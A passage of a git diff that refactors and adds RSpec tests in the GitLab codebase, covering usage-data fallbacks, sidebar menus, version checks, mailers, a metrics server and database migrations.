- stub_feature_flags(usage_data_instrumentation: false) - end + context 'with should_raise_for_dev? 
true' do + let(:should_raise_for_dev) { true } - it 'computes the metric value for given metric' do - expect(described_class.add_metric(metric)).to eq(Gitlab::CurrentSettings.uuid) - end + it 'raises an error' do + expect { subject }.to raise_error(ActiveRecord::StatementInvalid) end end end + describe '#add_metric' do + let(:metric) { 'UuidMetric'} + + it 'computes the metric value for given metric' do + expect(described_class.add_metric(metric)).to eq(Gitlab::CurrentSettings.uuid) + end + end + describe '#count' do let(:relation) { double(:relation) } @@ -40,11 +46,14 @@ RSpec.describe Gitlab::Utils::UsageData do expect(described_class.count(relation, batch: false)).to eq(1) end - it 'returns the fallback value when counting fails' do - stub_const("Gitlab::Utils::UsageData::FALLBACK", 15) - allow(relation).to receive(:count).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails' do + subject { described_class.count(relation, batch: false) } - expect(described_class.count(relation, batch: false)).to eq(15) + let(:fallback) { 15 } + let(:failing_class) { relation } + let(:failing_method) { :count } + + it_behaves_like 'failing hardening method' end end @@ -57,11 +66,14 @@ RSpec.describe Gitlab::Utils::UsageData do expect(described_class.distinct_count(relation, batch: false)).to eq(1) end - it 'returns the fallback value when counting fails' do - stub_const("Gitlab::Utils::UsageData::FALLBACK", 15) - allow(relation).to receive(:distinct_count_by).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails' do + subject { described_class.distinct_count(relation, batch: false) } + + let(:fallback) { 15 } + let(:failing_class) { relation } + let(:failing_method) { :distinct_count_by } - expect(described_class.distinct_count(relation, batch: false)).to eq(15) + it_behaves_like 'failing hardening method' end end @@ -106,7 +118,7 @@ RSpec.describe Gitlab::Utils::UsageData do # build_needs set: ['1', '2', '3', '4', '5'] # 
ci_build set ['a', 'b'] # with them, current implementation is expected to consistently report - # 5.217656147118495 and 2.0809220082170614 values + # the same static values # This test suite is expected to assure, that HyperLogLog implementation # behaves consistently between changes made to other parts of codebase. # In case of fine tuning or changes to HyperLogLog algorithm implementation @@ -118,8 +130,8 @@ RSpec.describe Gitlab::Utils::UsageData do let(:model) { Ci::BuildNeed } let(:column) { :name } - let(:build_needs_estimated_cardinality) { 5.217656147118495 } - let(:ci_builds_estimated_cardinality) { 2.0809220082170614 } + let(:build_needs_estimated_cardinality) { 5.024574181542231 } + let(:ci_builds_estimated_cardinality) { 2.003916452421793 } before do allow(model.connection).to receive(:transaction_open?).and_return(false) @@ -173,14 +185,24 @@ RSpec.describe Gitlab::Utils::UsageData do stub_const("Gitlab::Utils::UsageData::DISTRIBUTED_HLL_FALLBACK", 4) end - it 'returns fallback if counter raises WRONG_CONFIGURATION_ERROR' do - expect(described_class.estimate_batch_distinct_count(relation, 'id', start: 1, finish: 0)).to eq 3 + context 'when counter raises WRONG_CONFIGURATION_ERROR' do + subject { described_class.estimate_batch_distinct_count(relation, 'id', start: 1, finish: 0) } + + let(:fallback) { 3 } + let(:failing_class) { Gitlab::Database::PostgresHll::BatchDistinctCounter } + let(:failing_method) { :new } + + it_behaves_like 'failing hardening method' end - it 'returns default fallback value when counting fails due to database error' do - allow(Gitlab::Database::PostgresHll::BatchDistinctCounter).to receive(:new).and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails due to database error' do + subject { described_class.estimate_batch_distinct_count(relation) } + + let(:fallback) { 3 } + let(:failing_class) { Gitlab::Database::PostgresHll::BatchDistinctCounter } + let(:failing_method) { :new } - 
expect(described_class.estimate_batch_distinct_count(relation)).to eq(3) + it_behaves_like 'failing hardening method' end it 'logs error and returns DISTRIBUTED_HLL_FALLBACK value when counting raises any error', :aggregate_failures do @@ -205,13 +227,14 @@ RSpec.describe Gitlab::Utils::UsageData do expect(described_class.sum(relation, :column, batch_size: 100, start: 2, finish: 3)).to eq(1) end - it 'returns the fallback value when counting fails' do - stub_const("Gitlab::Utils::UsageData::FALLBACK", 15) - allow(Gitlab::Database::BatchCount) - .to receive(:batch_sum) - .and_raise(ActiveRecord::StatementInvalid.new('')) + context 'when counting fails' do + subject { described_class.sum(relation, :column) } - expect(described_class.sum(relation, :column)).to eq(15) + let(:fallback) { 15 } + let(:failing_class) { Gitlab::Database::BatchCount } + let(:failing_method) { :batch_sum } + + it_behaves_like 'failing hardening method' end end @@ -291,23 +314,45 @@ RSpec.describe Gitlab::Utils::UsageData do expect(histogram).to eq('2' => 1) end - it 'returns fallback and logs canceled queries' do - create(:alert_management_http_integration, :active, project: project1) + context 'when query timeout' do + subject do + with_statement_timeout(0.001) do + relation = AlertManagement::HttpIntegration.select('pg_sleep(0.002)') + described_class.histogram(relation, column, buckets: 1..100) + end + end - expect(Gitlab::AppJsonLogger).to receive(:error).with( - event: 'histogram', - relation: relation.table_name, - operation: 'histogram', - operation_args: [column, 1, 100, 99], - query: kind_of(String), - message: /PG::QueryCanceled/ - ) + before do + allow(Gitlab::ErrorTracking).to receive(:should_raise_for_dev?).and_return(should_raise_for_dev) + create(:alert_management_http_integration, :active, project: project1) + end - with_statement_timeout(0.001) do - relation = AlertManagement::HttpIntegration.select('pg_sleep(0.002)') - histogram = described_class.histogram(relation, column, 
buckets: 1..100) + context 'with should_raise_for_dev? false' do + let(:should_raise_for_dev) { false } + + it 'logs canceled queries' do + expect(Gitlab::AppJsonLogger).to receive(:error).with( + event: 'histogram', + relation: relation.table_name, + operation: 'histogram', + operation_args: [column, 1, 100, 99], + query: kind_of(String), + message: /PG::QueryCanceled/ + ) + subject + end - expect(histogram).to eq(fallback) + it 'returns fallback' do + expect(subject).to eq(fallback) + end + end + + context 'with should_raise_for_dev? true' do + let(:should_raise_for_dev) { true } + + it 'raises error' do + expect { subject }.to raise_error(ActiveRecord::QueryCanceled) + end end end end diff --git a/spec/lib/gitlab/utils_spec.rb b/spec/lib/gitlab/utils_spec.rb index f1601294c07..d756ec5ef83 100644 --- a/spec/lib/gitlab/utils_spec.rb +++ b/spec/lib/gitlab/utils_spec.rb @@ -249,10 +249,16 @@ RSpec.describe Gitlab::Utils do end describe '.which' do - it 'finds the full path to an executable binary' do - expect(File).to receive(:executable?).with('/bin/sh').and_return(true) + before do + stub_env('PATH', '/sbin:/usr/bin:/home/joe/bin') + end + + it 'finds the full path to an executable binary in order of appearance' do + expect(File).to receive(:executable?).with('/sbin/tool').ordered.and_return(false) + expect(File).to receive(:executable?).with('/usr/bin/tool').ordered.and_return(true) + expect(File).not_to receive(:executable?).with('/home/joe/bin/tool') - expect(which('sh', 'PATH' => '/bin')).to eq('/bin/sh') + expect(which('tool')).to eq('/usr/bin/tool') end end diff --git a/spec/lib/google_api/cloud_platform/client_spec.rb b/spec/lib/google_api/cloud_platform/client_spec.rb index 3dd8f7c413e..3284c9cd0d1 100644 --- a/spec/lib/google_api/cloud_platform/client_spec.rb +++ b/spec/lib/google_api/cloud_platform/client_spec.rb @@ -209,4 +209,47 @@ RSpec.describe GoogleApi::CloudPlatform::Client do expect(subject.header).to eq({ 'User-Agent': 'GitLab/10.3 
(GPN:GitLab;)' }) end end + + describe '#list_projects' do + subject { client.list_projects } + + let(:list_of_projects) { [{}, {}, {}] } + let(:next_page_token) { nil } + let(:operation) { double('projects': list_of_projects, 'next_page_token': next_page_token) } + + it 'calls Google Api CloudResourceManagerService#list_projects' do + expect_any_instance_of(Google::Apis::CloudresourcemanagerV1::CloudResourceManagerService) + .to receive(:list_projects) + .and_return(operation) + is_expected.to eq(list_of_projects) + end + end + + describe '#create_service_account' do + subject { client.create_service_account(spy, spy, spy) } + + let(:operation) { double('Service Account') } + + it 'calls Google Api IamService#create_service_account' do + expect_any_instance_of(Google::Apis::IamV1::IamService) + .to receive(:create_service_account) + .with(any_args) + .and_return(operation) + is_expected.to eq(operation) + end + end + + describe '#create_service_account_key' do + subject { client.create_service_account_key(spy, spy) } + + let(:operation) { double('Service Account Key') } + + it 'calls Google Api IamService#create_service_account_key' do + expect_any_instance_of(Google::Apis::IamV1::IamService) + .to receive(:create_service_account_key) + .with(any_args) + .and_return(operation) + is_expected.to eq(operation) + end + end end diff --git a/spec/lib/sidebars/concerns/link_with_html_options_spec.rb b/spec/lib/sidebars/concerns/link_with_html_options_spec.rb new file mode 100644 index 00000000000..1e890bffad1 --- /dev/null +++ b/spec/lib/sidebars/concerns/link_with_html_options_spec.rb @@ -0,0 +1,39 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Sidebars::Concerns::LinkWithHtmlOptions do + let(:options) { {} } + + subject { Class.new { include Sidebars::Concerns::LinkWithHtmlOptions }.new } + + before do + allow(subject).to receive(:container_html_options).and_return(options) + end + + describe '#link_html_options' do + context 'with 
existing classes' do + let(:options) do + { + class: '_class1_ _class2_', + aria: { label: '_label_' } + } + end + + it 'includes class and default aria-label attribute' do + result = { + class: '_class1_ _class2_ gl-link', + aria: { label: '_label_' } + } + + expect(subject.link_html_options).to eq(result) + end + end + + context 'without existing classes' do + it 'includes gl-link class' do + expect(subject.link_html_options).to eq(class: 'gl-link') + end + end + end +end diff --git a/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb b/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb index e954d7a44ba..bc1fa3e88ff 100644 --- a/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb +++ b/spec/lib/sidebars/groups/menus/packages_registries_menu_spec.rb @@ -4,7 +4,7 @@ require 'spec_helper' RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do let_it_be(:owner) { create(:user) } - let_it_be(:group) do + let_it_be_with_reload(:group) do build(:group, :private).tap do |g| g.add_owner(owner) end @@ -70,6 +70,18 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do describe 'Menu items' do subject { find_menu(menu, item_id) } + shared_examples 'the menu entry is available' do + it 'the menu item is added to list of menu items' do + is_expected.not_to be_nil + end + end + + shared_examples 'the menu entry is not available' do + it 'the menu item is not added to list of menu items' do + is_expected.to be_nil + end + end + describe 'Packages Registry' do let(:item_id) { :packages_registry } @@ -81,17 +93,13 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do context 'when config package setting is disabled' do let(:packages_enabled) { false } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end context 'when config package setting is enabled' do let(:packages_enabled) { true } - it 'the menu item is 
added to list of menu items' do - is_expected.not_to be_nil - end + it_behaves_like 'the menu entry is available' end end end @@ -107,24 +115,18 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do context 'when config registry setting is disabled' do let(:container_enabled) { false } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end context 'when config registry setting is enabled' do let(:container_enabled) { true } - it 'the menu item is added to list of menu items' do - is_expected.not_to be_nil - end + it_behaves_like 'the menu entry is available' context 'when user cannot read container images' do let(:user) { nil } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end end end @@ -141,17 +143,28 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do context 'when config dependency_proxy is enabled' do let(:dependency_enabled) { true } - it 'the menu item is added to list of menu items' do - is_expected.not_to be_nil + it_behaves_like 'the menu entry is available' + + context 'when the group settings exist' do + let_it_be(:dependency_proxy_group_setting) { create(:dependency_proxy_group_setting, group: group) } + + it_behaves_like 'the menu entry is available' + + context 'when the proxy is disabled at the group level' do + before do + dependency_proxy_group_setting.enabled = false + dependency_proxy_group_setting.save! 
+ end + + it_behaves_like 'the menu entry is not available' + end end end context 'when config dependency_proxy is not enabled' do let(:dependency_enabled) { false } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end end @@ -159,9 +172,7 @@ RSpec.describe Sidebars::Groups::Menus::PackagesRegistriesMenu do let(:user) { nil } let(:dependency_enabled) { true } - it 'the menu item is not added to list of menu items' do - is_expected.to be_nil - end + it_behaves_like 'the menu entry is not available' end end end diff --git a/spec/lib/sidebars/menu_spec.rb b/spec/lib/sidebars/menu_spec.rb index eb6a68f1afd..bdd9f22d5a0 100644 --- a/spec/lib/sidebars/menu_spec.rb +++ b/spec/lib/sidebars/menu_spec.rb @@ -153,6 +153,25 @@ RSpec.describe Sidebars::Menu do end end + describe '#remove_element' do + let(:item1) { Sidebars::MenuItem.new(title: 'foo1', link: 'foo1', active_routes: {}, item_id: :foo1) } + let(:item2) { Sidebars::MenuItem.new(title: 'foo2', link: 'foo2', active_routes: {}, item_id: :foo2) } + let(:item3) { Sidebars::MenuItem.new(title: 'foo3', link: 'foo3', active_routes: {}, item_id: :foo3) } + let(:list) { [item1, item2, item3] } + + it 'removes specific element' do + menu.remove_element(list, :foo2) + + expect(list).to eq [item1, item3] + end + + it 'does not remove nil elements' do + menu.remove_element(list, nil) + + expect(list).to eq [item1, item2, item3] + end + end + describe '#container_html_options' do before do allow(menu).to receive(:title).and_return('Foo Menu') diff --git a/spec/lib/sidebars/projects/menus/shimo_menu_spec.rb b/spec/lib/sidebars/projects/menus/shimo_menu_spec.rb new file mode 100644 index 00000000000..534267a329e --- /dev/null +++ b/spec/lib/sidebars/projects/menus/shimo_menu_spec.rb @@ -0,0 +1,44 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Sidebars::Projects::Menus::ShimoMenu do + 
let_it_be_with_reload(:project) { create(:project) } + + let(:context) { Sidebars::Projects::Context.new(current_user: project.owner, container: project) } + + subject(:shimo_menu) { described_class.new(context) } + + describe '#render?' do + context 'without a valid Shimo integration' do + it "doesn't render the menu" do + expect(shimo_menu.render?).to be_falsey + end + end + + context 'with a valid Shimo integration' do + let_it_be_with_reload(:shimo_integration) { create(:shimo_integration, project: project) } + + context 'when integration is active' do + it 'renders the menu' do + expect(shimo_menu.render?).to eq true + end + + it 'renders menu link' do + expected_url = Rails.application.routes.url_helpers.project_integrations_shimo_path(project) + expect(shimo_menu.link).to eq expected_url + end + end + + context 'when integration is inactive' do + before do + shimo_integration.update!(active: false) + end + + it "doesn't render the menu" do + expect(shimo_menu.render?).to eq false + end + end + end + end +end diff --git a/spec/lib/version_check_spec.rb b/spec/lib/version_check_spec.rb index 23c381e241e..d7a772a3f7e 100644 --- a/spec/lib/version_check_spec.rb +++ b/spec/lib/version_check_spec.rb @@ -3,9 +3,67 @@ require 'spec_helper' RSpec.describe VersionCheck do + describe '.image_url' do + it 'returns the correct URL' do + expect(described_class.image_url).to match(%r{\A#{Regexp.escape(described_class.host)}/check\.svg\?gitlab_info=\w+}) + end + end + describe '.url' do it 'returns the correct URL' do - expect(described_class.url).to match(%r{\A#{Regexp.escape(described_class.host)}/check\.svg\?gitlab_info=\w+}) + expect(described_class.url).to match(%r{\A#{Regexp.escape(described_class.host)}/check\.json\?gitlab_info=\w+}) + end + end + + describe '#calculate_reactive_cache' do + context 'response code is 200' do + before do + stub_request(:get, described_class.url).to_return(status: 200, body: '{ "status": "success" }', headers: {}) + end + + it 'returns 
the response object' do + expect(described_class.new.calculate_reactive_cache).to eq("{ \"status\": \"success\" }") + end + end + + context 'response code is not 200' do + before do + stub_request(:get, described_class.url).to_return(status: 500, body: nil, headers: {}) + end + + it 'returns nil' do + expect(described_class.new.calculate_reactive_cache).to be(nil) + end + end + end + + describe '#response' do + context 'cache returns value' do + let(:response) { { "severity" => "success" }.to_json } + + before do + allow_next_instance_of(described_class) do |instance| + allow(instance).to receive(:with_reactive_cache).and_return(response) + end + end + + it 'returns the response object' do + expect(described_class.new.response).to be(response) + end + end + + context 'cache returns nil' do + let(:response) { nil } + + before do + allow_next_instance_of(described_class) do |instance| + allow(instance).to receive(:with_reactive_cache).and_return(response) + end + end + + it 'returns nil' do + expect(described_class.new.response).to be(nil) + end end end end diff --git a/spec/mailers/emails/in_product_marketing_spec.rb b/spec/mailers/emails/in_product_marketing_spec.rb index 3b92b049e42..720e6f101a8 100644 --- a/spec/mailers/emails/in_product_marketing_spec.rb +++ b/spec/mailers/emails/in_product_marketing_spec.rb @@ -5,29 +5,11 @@ require 'email_spec' RSpec.describe Emails::InProductMarketing do include EmailSpec::Matchers + include Gitlab::Routing.url_helpers let_it_be(:user) { create(:user) } - let_it_be(:group) { create(:group) } - - let!(:onboarding_progress) { create(:onboarding_progress, namespace: group) } - - describe '#in_product_marketing_email' do - using RSpec::Parameterized::TableSyntax - - let(:track) { :create } - let(:series) { 0 } - - subject { Notify.in_product_marketing_email(user.id, group.id, track, series) } - - include_context 'gitlab email notification' - - it 'sends to the right user with a link to unsubscribe' do - aggregate_failures do - 
expect(subject).to deliver_to(user.notification_email_or_default) - expect(subject).to have_body_text(profile_notifications_url) - end - end + shared_examples 'has custom headers when on gitlab.com' do context 'when on gitlab.com' do before do allow(Gitlab).to receive(:com?).and_return(true) @@ -45,6 +27,30 @@ RSpec.describe Emails::InProductMarketing do end end end + end + + describe '#in_product_marketing_email' do + let_it_be(:group) { create(:group) } + + let!(:onboarding_progress) { create(:onboarding_progress, namespace: group) } + + using RSpec::Parameterized::TableSyntax + + let(:track) { :create } + let(:series) { 0 } + + subject { Notify.in_product_marketing_email(user.id, group.id, track, series) } + + include_context 'gitlab email notification' + + it_behaves_like 'has custom headers when on gitlab.com' + + it 'sends to the right user with a link to unsubscribe' do + aggregate_failures do + expect(subject).to deliver_to(user.notification_email_or_default) + expect(subject).to have_body_text(profile_notifications_url) + end + end where(:track, :series) do :create | 0 @@ -68,7 +74,6 @@ RSpec.describe Emails::InProductMarketing do with_them do before do - stub_experiments(invite_members_for_task: :candidate) group.add_owner(user) end diff --git a/spec/mailers/notify_spec.rb b/spec/mailers/notify_spec.rb index a5e3350ec2e..44cb18008d2 100644 --- a/spec/mailers/notify_spec.rb +++ b/spec/mailers/notify_spec.rb @@ -613,6 +613,28 @@ RSpec.describe Notify do it 'has References header including the notes and issue of the discussion' do expect(subject.header['References'].message_ids).to include("issue_#{note.noteable.id}@#{host}") end + + context 'with private references accessible to the recipient' do + let_it_be(:private_project) { create(:project, :private) } + let_it_be(:private_issue) { create(:issue, :closed, project: private_project) } + + before_all do + private_project.add_guest(recipient) + + note.update!(note: "#{private_issue.to_reference(full: 
true)}") + end + + let(:html_part) { subject.body.parts.last.to_s } + + it 'does not redact the reference' do + expect(html_part).to include("data-reference-type=\"issue\"") + expect(html_part).to include("title=\"#{private_issue.title}\"") + end + + it 'renders expanded issue references' do + expect(html_part).to include("#{private_issue.to_reference(full: true)} (closed)") + end + end end end @@ -807,7 +829,7 @@ RSpec.describe Notify do end it_behaves_like 'an email sent from GitLab' - it_behaves_like 'it should not have Gmail Actions links' + it_behaves_like 'it should show Gmail Actions Join now link' it_behaves_like "a user cannot unsubscribe through footer link" it_behaves_like 'appearance header and footer enabled' it_behaves_like 'appearance header and footer not enabled' @@ -845,48 +867,6 @@ RSpec.describe Notify do end end - context 'with invite_email_preview_text enabled', :experiment do - before do - stub_experiments(invite_email_preview_text: :control) - end - - it 'has the correct invite_url with params' do - is_expected.to have_link('Join now', - href: invite_url(project_member.invite_token, - invite_type: Emails::Members::INITIAL_INVITE, - experiment_name: 'invite_email_preview_text')) - end - - it 'tracks the sent invite' do - expect(experiment(:invite_email_preview_text)).to track(:assignment) - .with_context(actor: project_member) - .on_next_instance - - invite_email.deliver_now - end - end - - context 'with invite_email_from enabled', :experiment do - before do - stub_experiments(invite_email_from: :control) - end - - it 'has the correct invite_url with params' do - is_expected.to have_link('Join now', - href: invite_url(project_member.invite_token, - invite_type: Emails::Members::INITIAL_INVITE, - experiment_name: 'invite_email_from')) - end - - it 'tracks the sent invite' do - expect(experiment(:invite_email_from)).to track(:assignment) - .with_context(actor: project_member) - .on_next_instance - - invite_email.deliver_now - end - end - 
context 'when invite email sent is tracked', :snowplow do it 'tracks the sent invite' do invite_email.deliver_now @@ -1460,7 +1440,7 @@ RSpec.describe Notify do subject { described_class.member_invited_email('Group', group_member.id, group_member.invite_token) } it_behaves_like 'an email sent from GitLab' - it_behaves_like 'it should not have Gmail Actions links' + it_behaves_like 'it should show Gmail Actions Join now link' it_behaves_like "a user cannot unsubscribe through footer link" it_behaves_like 'appearance header and footer enabled' it_behaves_like 'appearance header and footer not enabled' diff --git a/spec/metrics_server/metrics_server_spec.rb b/spec/metrics_server/metrics_server_spec.rb new file mode 100644 index 00000000000..4e3c6900875 --- /dev/null +++ b/spec/metrics_server/metrics_server_spec.rb @@ -0,0 +1,109 @@ +# frozen_string_literal: true + +require 'fast_spec_helper' + +require_relative '../../metrics_server/metrics_server' +require_relative '../support/helpers/next_instance_of' + +RSpec.describe MetricsServer do # rubocop:disable RSpec/FilePath + include NextInstanceOf + + before do + # We do not want this to have knock-on effects on the test process. 
+ allow(Gitlab::ProcessManagement).to receive(:modify_signals) + end + + describe '.spawn' do + context 'when in parent process' do + it 'forks into a new process and detaches it' do + expect(Process).to receive(:fork).and_return(99) + expect(Process).to receive(:detach).with(99) + + described_class.spawn('sidekiq', metrics_dir: 'path/to/metrics') + end + end + + context 'when in child process' do + before do + # This signals the process that it's "inside" the fork + expect(Process).to receive(:fork).and_return(nil) + expect(Process).not_to receive(:detach) + end + + it 'starts the metrics server with the given arguments' do + expect_next_instance_of(MetricsServer) do |server| + expect(server).to receive(:start) + end + + described_class.spawn('sidekiq', metrics_dir: 'path/to/metrics') + end + + it 'resets signal handlers from parent process' do + expect(Gitlab::ProcessManagement).to receive(:modify_signals).with(%i[A B], 'DEFAULT') + + described_class.spawn('sidekiq', metrics_dir: 'path/to/metrics', trapped_signals: %i[A B]) + end + end + end + + describe '#start' do + let(:exporter_class) { Class.new(Gitlab::Metrics::Exporter::BaseExporter) } + let(:exporter_double) { double('fake_exporter', start: true) } + let(:prometheus_config) { ::Prometheus::Client.configuration } + let(:metrics_dir) { Dir.mktmpdir } + let(:settings) { { "fake_exporter" => { "enabled" => true } } } + let!(:old_metrics_dir) { prometheus_config.multiprocess_files_dir } + + subject(:metrics_server) { described_class.new('fake', metrics_dir, true)} + + before do + stub_const('Gitlab::Metrics::Exporter::FakeExporter', exporter_class) + expect(exporter_class).to receive(:instance).with(settings['fake_exporter'], synchronous: true).and_return(exporter_double) + expect(Settings).to receive(:monitoring).and_return(settings) + end + + after do + Gitlab::Metrics.reset_registry! 
+ FileUtils.rm_rf(metrics_dir, secure: true) + prometheus_config.multiprocess_files_dir = old_metrics_dir + end + + it 'configures ::Prometheus::Client' do + metrics_server.start + + expect(prometheus_config.multiprocess_files_dir).to eq metrics_dir + end + + it 'ensures that metrics directory exists in correct mode (0700)' do + expect(FileUtils).to receive(:mkdir_p).with(metrics_dir, mode: 0700) + + metrics_server.start + end + + context 'when wipe_metrics_dir is true' do + subject(:metrics_server) { described_class.new('fake', metrics_dir, true)} + + it 'removes any old metrics files' do + FileUtils.touch("#{metrics_dir}/remove_this.db") + + expect { metrics_server.start }.to change { Dir.empty?(metrics_dir) }.from(false).to(true) + end + end + + context 'when wipe_metrics_dir is false' do + subject(:metrics_server) { described_class.new('fake', metrics_dir, false)} + + it 'does not remove any old metrics files' do + FileUtils.touch("#{metrics_dir}/remove_this.db") + + expect { metrics_server.start }.not_to change { Dir.empty?(metrics_dir) }.from(false) + end + end + + it 'starts a metrics server' do + expect(exporter_double).to receive(:start) + + metrics_server.start + end + end +end diff --git a/spec/migrations/20210713042000_fix_ci_sources_pipelines_index_names_spec.rb b/spec/migrations/20210713042000_fix_ci_sources_pipelines_index_names_spec.rb new file mode 100644 index 00000000000..adec1e05533 --- /dev/null +++ b/spec/migrations/20210713042000_fix_ci_sources_pipelines_index_names_spec.rb @@ -0,0 +1,67 @@ +# frozen_string_literal: true + +require 'spec_helper' +require_migration! + +RSpec.describe FixCiSourcesPipelinesIndexNames, :migration do + def validate_foreign_keys_and_index! 
+ aggregate_failures do + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_builds, column: :source_job_id, name: 'fk_be5624bf37')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_pipelines, column: :pipeline_id, name: 'fk_e1bad85861')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_pipelines, column: :source_pipeline_id, name: 'fk_d4e29af7d7')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :projects, column: :source_project_id, name: 'fk_acd9737679')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :projects, name: 'fk_1e53c97c0a')).to be_truthy + expect(subject.foreign_key_exists?(:ci_sources_pipelines, :ci_builds, column: :source_job_id_convert_to_bigint, name: 'fk_be5624bf37_tmp')).to be_falsey + + expect(subject.index_exists_by_name?(:ci_sources_pipelines, described_class::NEW_INDEX_NAME)).to be_truthy + expect(subject.index_exists_by_name?(:ci_sources_pipelines, described_class::OLD_INDEX_NAME)).to be_falsey + end + end + + it 'existing foreign keys and indexes are untouched' do + validate_foreign_keys_and_index! + + migrate! + + validate_foreign_keys_and_index! 
+ end + + context 'with a legacy (pre-GitLab 10.0) foreign key' do + let(:old_foreign_keys) { described_class::OLD_TO_NEW_FOREIGN_KEY_DEFS.keys } + let(:new_foreign_keys) { described_class::OLD_TO_NEW_FOREIGN_KEY_DEFS.values.map { |entry| entry[:name] } } + + before do + new_foreign_keys.each { |name| subject.remove_foreign_key_if_exists(:ci_sources_pipelines, name: name) } + + # GitLab 9.5.4: https://gitlab.com/gitlab-org/gitlab/-/blob/v9.5.4-ee/db/schema.rb#L2026-2030 + subject.add_foreign_key(:ci_sources_pipelines, :ci_builds, column: :source_job_id, name: 'fk_3f0c88d7dc', on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :ci_pipelines, column: :pipeline_id, name: "fk_b8c0fac459", on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :ci_pipelines, column: :source_pipeline_id, name: "fk_3a3e3cb83a", on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :projects, column: :source_project_id, name: "fk_8868d0f3e4", on_delete: :cascade) + subject.add_foreign_key(:ci_sources_pipelines, :projects, name: "fk_83b4346e48", on_delete: :cascade) + + # https://gitlab.com/gitlab-org/gitlab/-/blob/v9.5.4-ee/db/schema.rb#L443 + subject.add_index "ci_sources_pipelines", ["source_job_id"], name: described_class::OLD_INDEX_NAME, using: :btree + end + + context 'when new index already exists' do + it 'corrects foreign key constraints and drops old index' do + expect { migrate! }.to change { subject.foreign_key_exists?(:ci_sources_pipelines, :ci_builds, column: :source_job_id, name: 'fk_3f0c88d7dc') }.from(true).to(false) + + validate_foreign_keys_and_index! + end + end + + context 'when new index does not exist' do + before do + subject.remove_index("ci_sources_pipelines", name: described_class::NEW_INDEX_NAME) + end + + it 'drops the old index' do + expect { migrate! }.to change { subject.index_exists_by_name?(:ci_sources_pipelines, described_class::OLD_INDEX_NAME) }.from(true).to(false) + + validate_foreign_keys_and_index! 
+ end + end + end +end diff --git a/spec/migrations/20210804150320_create_base_work_item_types_spec.rb b/spec/migrations/20210804150320_create_base_work_item_types_spec.rb index 34ea7f53f51..6df8e1b2ebf 100644 --- a/spec/migrations/20210804150320_create_base_work_item_types_spec.rb +++ b/spec/migrations/20210804150320_create_base_work_item_types_spec.rb @@ -4,18 +4,28 @@ require 'spec_helper' require_migration! RSpec.describe CreateBaseWorkItemTypes, :migration do - let!(:work_item_types) { table(:work_item_types) } + include MigrationHelpers::WorkItemTypesHelper + + let_it_be(:work_item_types) { table(:work_item_types) } + + let(:base_types) do + { + issue: 0, + incident: 1, + test_case: 2, + requirement: 3 + } + end after(:all) do # Make sure base types are recreated after running the migration # because migration specs are not run in a transaction - WorkItem::Type.delete_all - Gitlab::DatabaseImporters::WorkItems::BaseTypeImporter.import + reset_work_item_types end it 'creates default data' do # Need to delete all as base types are seeded before entire test suite - WorkItem::Type.delete_all + work_item_types.delete_all reversible_migration do |migration| migration.before -> { @@ -24,8 +34,8 @@ RSpec.describe CreateBaseWorkItemTypes, :migration do } migration.after -> { - expect(work_item_types.count).to eq 4 - expect(work_item_types.all.pluck(:base_type)).to match_array WorkItem::Type.base_types.values + expect(work_item_types.count).to eq(4) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } end end diff --git a/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb b/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb index 3c8c55ccb80..1957a973ee1 100644 --- a/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb +++ b/spec/migrations/20210831203408_upsert_base_work_item_types_spec.rb @@ -4,19 +4,29 @@ require 'spec_helper' require_migration! 
RSpec.describe UpsertBaseWorkItemTypes, :migration do - let!(:work_item_types) { table(:work_item_types) } + include MigrationHelpers::WorkItemTypesHelper + + let_it_be(:work_item_types) { table(:work_item_types) } + + let(:base_types) do + { + issue: 0, + incident: 1, + test_case: 2, + requirement: 3 + } + end after(:all) do # Make sure base types are recreated after running the migration # because migration specs are not run in a transaction - WorkItem::Type.delete_all - Gitlab::DatabaseImporters::WorkItems::BaseTypeImporter.import + reset_work_item_types end context 'when no default types exist' do it 'creates default data' do # Need to delete all as base types are seeded before entire test suite - WorkItem::Type.delete_all + work_item_types.delete_all expect(work_item_types.count).to eq(0) @@ -29,7 +39,7 @@ RSpec.describe UpsertBaseWorkItemTypes, :migration do migration.after -> { expect(work_item_types.count).to eq(4) - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + expect(work_item_types.all.pluck(:base_type)).to match_array(base_types.values) } end end @@ -37,16 +47,21 @@ RSpec.describe UpsertBaseWorkItemTypes, :migration do context 'when default types already exist' do it 'does not create default types again' do - expect(work_item_types.all.pluck(:base_type)).to match_array(WorkItem::Type.base_types.values) + # Database needs to be in a similar state as when this migration was created + work_item_types.delete_all + work_item_types.find_or_create_by!(name: 